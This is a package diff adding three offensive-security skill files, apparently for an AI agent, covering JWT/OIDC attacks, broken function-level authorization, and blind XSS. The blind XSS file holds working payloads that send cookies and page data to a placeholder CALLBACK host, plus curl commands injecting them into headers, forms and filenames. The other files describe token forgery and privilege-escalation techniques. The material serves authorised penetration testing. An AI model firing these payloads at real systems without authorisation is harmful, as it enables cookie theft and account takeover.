@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md

@@ -0,0 +1,158 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: authentication-jwt
+description: JWT and OIDC security testing covering token forgery, algorithm confusion, and claim manipulation
+---
+
+# Authentication / JWT / OIDC
+
+JWT/OIDC failures often enable token forgery, token confusion, cross-service acceptance, and durable account takeover. Do not trust headers, claims, or token opacity without strict validation bound to issuer, audience, key, and context.
+
+## Attack Surface
+
+- Web/mobile/API authentication using JWT (JWS/JWE) and OIDC/OAuth2
+- Access vs ID tokens, refresh tokens, device/PKCE/Backchannel flows
+- First-party and microservices verification, gateways, and JWKS distribution
+
+## Reconnaissance
+
+### Endpoints
+
+- Well-known: `/.well-known/openid-configuration`, `/oauth2/.well-known/openid-configuration`
+- Keys: `/jwks.json`, rotating key endpoints, tenant-specific JWKS
+- Auth: `/authorize`, `/token`, `/introspect`, `/revoke`, `/logout`, device code endpoints
+- App: `/login`, `/callback`, `/refresh`, `/me`, `/session`, `/impersonate`
+
+### Token Features
+
+- Headers: `{"alg":"RS256","kid":"...","typ":"JWT","jku":"...","x5u":"...","jwk":{...}}`
+- Claims: `{"iss":"...","aud":"...","azp":"...","sub":"user","scope":"...","exp":...,"nbf":...,"iat":...}`
+- Formats: JWS (signed), JWE (encrypted). Note unencoded payload option (`"b64":false`) and critical headers (`"crit"`)
+
+## Key Vulnerabilities
+
+### Signature Verification
+
+- RS256→HS256 confusion: change alg to HS256 and use the RSA public key as HMAC secret if algorithm is not pinned
+- "none" algorithm acceptance: set `"alg":"none"` and drop the signature if libraries accept it
+- ECDSA malleability/misuse: weak verification settings accepting non-canonical signatures
+
+### Header Manipulation
+
+- **kid injection**: path traversal `../../../../keys/prod.key`, SQL/command/template injection in key lookup, or pointing to world-readable files
+- **jku/x5u abuse**: host attacker-controlled JWKS/X509 chain; if not pinned/whitelisted, server fetches and trusts attacker keys
+- **jwk header injection**: embed attacker JWK in header; some libraries prefer inline JWK over server-configured keys
+- **SSRF via remote key fetch**: exploit JWKS URL fetching to reach internal hosts
+
+### Key and Cache Issues
+
+- JWKS caching TTL and key rollover: accept obsolete keys; race rotation windows; missing kid pinning → accept any matching kty/alg
+- Mixed environments: same secrets across dev/stage/prod; key reuse across tenants or services
+- Fallbacks: verification succeeds when kid not found by trying all keys or no keys (implementation bugs)
+
+### Claims Validation Gaps
+
+- iss/aud/azp not enforced: cross-service token reuse; accept tokens from any issuer or wrong audience
+- scope/roles fully trusted from token: server does not re-derive authorization; privilege inflation via claim edits when signature checks are weak
+- exp/nbf/iat not enforced or large clock skew tolerance; accept long-expired or not-yet-valid tokens
+- typ/cty not enforced: accept ID token where access token required (token confusion)
+
+### Token Confusion and OIDC
+
+- Access vs ID token swap: use ID token against APIs when they only verify signature but not audience/typ
+- OIDC mix-up: redirect_uri and client mix-ups causing tokens for Client A to be redeemed at Client B
+- PKCE downgrades: missing S256 requirement; accept plain or absent code_verifier
+- State/nonce weaknesses: predictable or missing → CSRF/logical interception of login
+- Device/Backchannel flows: codes and tokens accepted by unintended clients or services
+
+### Refresh and Session
+
+- Refresh token rotation not enforced: reuse old refresh token indefinitely; no reuse detection
+- Long-lived JWTs with no revocation: persistent access post-logout
+- Session fixation: bind new tokens to attacker-controlled session identifiers or cookies
+
+### Transport and Storage
+
+- Token in localStorage/sessionStorage: susceptible to XSS exfiltration; cookie vs header trade-offs with SameSite/CSRF
+- Insecure CORS: wildcard origins with credentialed requests expose tokens and protected responses
+- TLS and cookie flags: missing Secure/HttpOnly; lack of mTLS or DPoP/"cnf" binding permits replay from another device
+
+## Advanced Techniques
+
+### Microservices and Gateways
+
+- Audience mismatch: internal services verify signature but ignore aud → accept tokens for other services
+- Header trust: edge or gateway injects X-User-Id; backend trusts it over token claims
+- Asynchronous consumers: workers process messages with bearer tokens but skip verification on replay
+
+### JWS Edge Cases
+
+- Unencoded payload (b64=false) with crit header: libraries mishandle verification paths
+- Nested JWT (JWT-in-JWT) verification order errors; outer token accepted while inner claims ignored
+
+## Special Contexts
+
+### Mobile
+
+- Deep-link/redirect handling bugs leak codes/tokens; insecure WebView bridges exposing tokens
+- Token storage in plaintext files/SQLite/Keychain/SharedPrefs; backup/adb accessible
+
+### SSO Federation
+
+- Misconfigured trust between multiple IdPs/SPs, mixed metadata, or stale keys lead to acceptance of foreign tokens
+
+## Chaining Attacks
+
+- XSS → token theft → replay across services with weak audience checks
+- SSRF → fetch private JWKS → sign tokens accepted by internal services
+- Host header poisoning → OIDC redirect_uri poisoning → code capture
+- IDOR in sessions/impersonation endpoints → mint tokens for other users
+
+## Testing Methodology
+
+1. **Inventory issuers/consumers** - Identity providers, API gateways, services, mobile/web clients
+2. **Capture tokens** - Access and ID tokens for multiple roles; note header, claims, signature
+3. **Map verification endpoints** - `/.well-known`, `/jwks.json`
+4. **Build matrix** - Token Type × Audience × Service; attempt cross-use
+5. **Mutate components** - Headers (alg, kid, jku/x5u/jwk), claims (iss/aud/azp/sub/exp), signatures
+6. **Verify enforcement** - What is actually checked vs assumed
+
+## Validation
+
+1. Show forged or cross-context token acceptance (wrong alg, wrong audience/issuer, or attacker-signed JWKS)
+2. Demonstrate access token vs ID token confusion at an API
+3. Prove refresh token reuse without rotation detection or revocation
+4. Confirm header abuse (kid/jku/x5u/jwk) leading to key selection under attacker control
+5. Provide owner vs non-owner evidence with identical requests differing only in token context
+
+## False Positives
+
+- Token rejected due to strict audience/issuer enforcement
+- Key pinning with JWKS whitelist and TLS validation
+- Short-lived tokens with rotation and revocation on logout
+- ID token not accepted by APIs that require access tokens
+
+## Impact
+
+- Account takeover and durable session persistence
+- Privilege escalation via claim manipulation or cross-service acceptance
+- Cross-tenant or cross-application data access
+- Token minting by attacker-controlled keys or endpoints
+
+## Pro Tips
+
+1. Pin verification to issuer and audience; log and diff claim sets across services
+2. Attempt RS256→HS256 and "none" first only if algorithm pinning is unclear; otherwise focus on header key control (kid/jku/x5u/jwk)
+3. Test token reuse across all services; many backends only check signature, not audience/typ
+4. Exploit JWKS caching and rotation races; try retired keys and missing kid fallbacks
+5. Exercise OIDC flows with PKCE/state/nonce variants and mixed clients; look for mix-up
+6. Try DPoP/mTLS absence to replay tokens from different devices
+7. Treat refresh as its own surface: rotation, reuse detection, and audience scoping
+8. Validate every acceptance path: gateway, service, worker, WebSocket, and gRPC
+9. Favor minimal PoCs that clearly show cross-context acceptance and durable access
+10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each
+
+## Summary
+
+Verification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.

package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md

@@ -0,0 +1,156 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: broken-function-level-authorization
+description: BFLA testing for action-level authorization failures across endpoints, admin functions, and API operations
+---
+
+# Broken Function Level Authorization (BFLA)
+
+BFLA is action-level authorization failure: callers invoke functions (endpoints, mutations, admin tools) they are not entitled to. It appears when enforcement differs across transports, gateways, roles, or when services trust client hints. Bind subject × action at the service that performs the action.
+
+## Attack Surface
+
+- Vertical authz: privileged/admin/staff-only actions reachable by basic users
+- Feature gates: toggles enforced at edge/UI, not at core services
+- Transport drift: REST vs GraphQL vs gRPC vs WebSocket with inconsistent checks
+- Gateway trust: backends trust X-User-Id/X-Role injected by proxies/edges
+- Background workers/jobs performing actions without re-checking authz
+
+## High-Value Actions
+
+- Role/permission changes, impersonation/sudo, invite/accept into orgs
+- Approve/void/refund/credit issuance, price/plan overrides
+- Export/report generation, data deletion, account suspension/reactivation
+- Feature flag toggles, quota/grant adjustments, license/seat changes
+- Security settings: 2FA reset, email/phone verification overrides
+
+## Reconnaissance
+
+### Surface Enumeration
+
+- Admin/staff consoles and APIs, support tools, internal-only endpoints exposed via gateway
+- Hidden buttons and disabled UI paths (feature-flagged) mapped to still-live endpoints
+- GraphQL schemas: mutations and admin-only fields/types; gRPC service descriptors (reflection)
+- Mobile clients often reveal extra endpoints/roles in app bundles or network logs
+
+### Signals
+
+- 401/403 on UI but 200 via direct API call; differing status codes across transports
+- Actions succeed via background jobs when direct call is denied
+- Changing only headers (role/org) alters access without token change
+
+## Key Vulnerabilities
+
+### Verb Drift and Aliases
+
+- Alternate methods: GET performing state change; POST vs PUT vs PATCH differences; X-HTTP-Method-Override/_method
+- Alternate endpoints performing the same action with weaker checks (legacy vs v2, mobile vs web)
+
+### Edge vs Core Mismatch
+
+- Edge blocks an action but core service RPC accepts it directly; call internal service via exposed API route or SSRF
+- Gateway-injected identity headers override token claims; supply conflicting headers to test precedence
+
+### Feature Flag Bypass
+
+- Client-checked feature gates; call backend endpoints directly
+- Admin-only mutations exposed but hidden in UI; invoke via GraphQL or gRPC tools
+
+### Batch Job Paths
+
+- Create export/import jobs where creation is allowed but finalize/approve lacks authz; finalize others' jobs
+- Replay webhooks/background tasks endpoints that perform privileged actions without verifying caller
+
+### Content-Type Paths
+
+- JSON vs form vs multipart handlers using different middleware: send the action via the most permissive parser
+
+## Advanced Techniques
+
+### GraphQL
+
+- Resolver-level checks per mutation/field; do not assume top-level auth covers nested mutations or admin fields
+- Abuse aliases/batching to sneak privileged fields; persisted queries sometimes bypass auth transforms
+
+```graphql
+mutation Promote($id:ID!){
+  a: updateUser(id:$id, role: ADMIN){ id role }
+}
+```
+
+### gRPC
+
+- Method-level auth via interceptors must enforce audience/roles; probe direct gRPC with tokens of lower role
+- Reflection lists services/methods; call admin methods that the gateway hid
+
+### WebSocket
+
+- Handshake-only auth: ensure per-message authorization on privileged events (e.g., admin:impersonate)
+- Try emitting privileged actions after joining standard channels
+
+### Multi-Tenant
+
+- Actions requiring tenant admin enforced only by header/subdomain; attempt cross-tenant admin actions by switching selectors with same token
+
+### Microservices
+
+- Internal RPCs trust upstream checks; reach them through exposed endpoints or SSRF; verify each service re-enforces authz
+
+## Bypass Techniques
+
+### Header Trust
+
+- Supply X-User-Id/X-Role/X-Organization headers; remove or contradict token claims; observe which source wins
+
+### Route Shadowing
+
+- Legacy/alternate routes (e.g., /admin/v1 vs /v2/admin) that skip new middleware chains
+
+### Idempotency and Retries
+
+- Retry or replay finalize/approve endpoints that apply state without checking actor on each call
+
+### Cache Key Confusion
+
+- Cached authorization decisions at edge leading to cross-user reuse; test with Vary and session swaps
+
+## Testing Methodology
+
+1. **Build Actor × Action matrix** - Unauth, basic, premium, staff/admin; enumerate actions per role
+2. **Obtain tokens/sessions** - For each role
+3. **Exercise every action** - Across all transports and encodings (JSON, form, multipart), including method overrides
+4. **Vary headers and selectors** - Org/tenant/project; test behind gateway vs direct-to-service
+5. **Include background flows** - Job creation/finalization, webhooks, queues; confirm re-validation
+
+## Validation
+
+1. Show a lower-privileged principal successfully invokes a restricted action (same inputs) while the proper role succeeds and another lower role fails
+2. Provide evidence across at least two transports or encodings demonstrating inconsistent enforcement
+3. Demonstrate that removing/altering client-side gates (buttons/flags) does not affect backend success
+4. Include durable state change proof: before/after snapshots, audit logs, and authoritative sources
+
+## False Positives
+
+- Read-only endpoints mislabeled as admin but publicly documented
+- Feature toggles intentionally open to all roles for preview/beta with clear policy
+- Simulated environments where admin endpoints are stubbed with no side effects
+
+## Impact
+
+- Privilege escalation to admin/staff actions
+- Monetary/state impact: refunds/credits/approvals without authorization
+- Tenant-wide configuration changes, impersonation, or data deletion
+- Compliance and audit violations due to bypassed approval workflows
+
+## Pro Tips
+
+1. Start from the role matrix; test every action with basic vs admin tokens across REST/GraphQL/gRPC
+2. Diff middleware stacks between routes; weak chains often exist on legacy or alternate encodings
+3. Inspect gateways for identity header injection; never trust client-provided identity
+4. Treat jobs/webhooks as first-class: finalize/approve must re-check the actor
+5. Prefer minimal PoCs: one request that flips a privileged field or invokes an admin method with a basic token
+
+## Summary
+
+Authorization must bind the actor to the specific action at the service boundary on every request and message. UI gates, gateways, or prior steps do not substitute for function-level checks.

package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md

@@ -0,0 +1,111 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# Blind XSS (Out-of-Band XSS)
+
+## Overview
+Blind XSS triggers in a different user context (admin panel, log viewer, moderation queue).
+Use out-of-band (OOB) callbacks to detect execution and collect evidence safely.
+
+## Prerequisites
+```bash
+# OOB callback service
+# (records hits and provides a unique domain)
+go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
+```
+
+## Phase 1: Setup Callback Channel
+```bash
+interactsh-client -o /workspace/output/TARGET_interactsh.txt
+# Note the generated domain: <CALLBACK>
+```
+
+## Phase 2: Identify Injection Points
+```bash
+cat > /workspace/output/TARGET_bxss_points.txt <<'POINTS'
+contact/support forms
+admin-mod review queues
+profile fields (name, bio, website)
+file upload filenames and metadata
+log viewers (user-agent, referer, x-forwarded-for)
+markdown/rich-text inputs
+POINTS
+```
+
+## Phase 3: Payload Set
+```bash
+cat > /workspace/output/TARGET_bxss_payloads.txt <<'PAYLOADS'
+"><script src=//CALLBACK/x.js></script>
+"><img src=x onerror="new Image().src='//CALLBACK/?c='+encodeURIComponent(document.cookie)">
+"><svg/onload=fetch('//CALLBACK/?d='+document.domain)>
+</script><script src=//CALLBACK/x.js></script>
+"><iframe src=javascript:fetch('//CALLBACK/?u='+document.URL)></iframe>
+PAYLOADS
+```
+
+## Phase 4: Header Injection (Log-Based Blind XSS)
+```bash
+PAYLOAD='<PAYLOAD_FROM_LIST>'
+
+curl -s https://TARGET/ \
+  -H "User-Agent: $PAYLOAD" \
+  -H "Referer: $PAYLOAD" \
+  -H "X-Forwarded-For: $PAYLOAD" \
+  -H "X-Real-IP: $PAYLOAD" \
+  | tee /workspace/output/TARGET_bxss_header_test.txt
+```
+
+## Phase 5: Stored/Delayed Execution
+```bash
+PAYLOAD='<PAYLOAD_FROM_LIST>'
+
+# Typical form submission
+curl -s -X POST https://TARGET/feedback \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  --data-urlencode "message=$PAYLOAD" \
+  | tee /workspace/output/TARGET_bxss_form_test.txt
+
+# File upload filename injection
+curl -s -X POST https://TARGET/upload \
+  -F "file=@/path/to/file.png;filename=\"$PAYLOAD.png\"" \
+  -F "title=test" \
+  | tee /workspace/output/TARGET_bxss_upload_test.txt
+```
+
+## Phase 6: Triage & Evidence Collection
+```bash
+# Review OOB hits and correlate timestamps + user-agent
+rg -n "http|https" /workspace/output/TARGET_interactsh.txt \
+  > /workspace/output/TARGET_bxss_hits.txt
+```
+
+## Report Template
+
+```
+Target: TARGET
+Callback Domain: <CALLBACK>
+Assessment Date: <DATE>
+
+## Confirmed Blind XSS
+- Injection point: <field/endpoint>
+- Payload: <payload>
+- Evidence: <timestamp + request details>
+- Execution context: <admin panel / log viewer / other>
+
+## Impact
+- Stored XSS in privileged context
+- Account takeover / CSRF token theft potential
+
+## Recommendations
+1. Encode output by context (HTML, attribute, JS, URL)
+2. Sanitize inputs and disallow dangerous tags/attrs
+3. Enforce CSP with strict `script-src` and no `unsafe-inline`
+4. Remove HTML rendering for untrusted fields in admin tools
+```
+
+## Output Files
+- `/workspace/output/TARGET_bxss_payloads.txt` — payload list
+- `/workspace/output/TARGET_bxss_points.txt` — target points
+- `/workspace/output/TARGET_interactsh.txt` — OOB callback log
+- `/workspace/output/TARGET_bxss_hits.txt` — extracted hits
+
+indicators: blind xss, bxss, out of band xss, xss hunter, xsshunter, oob xss, stored xss, log xss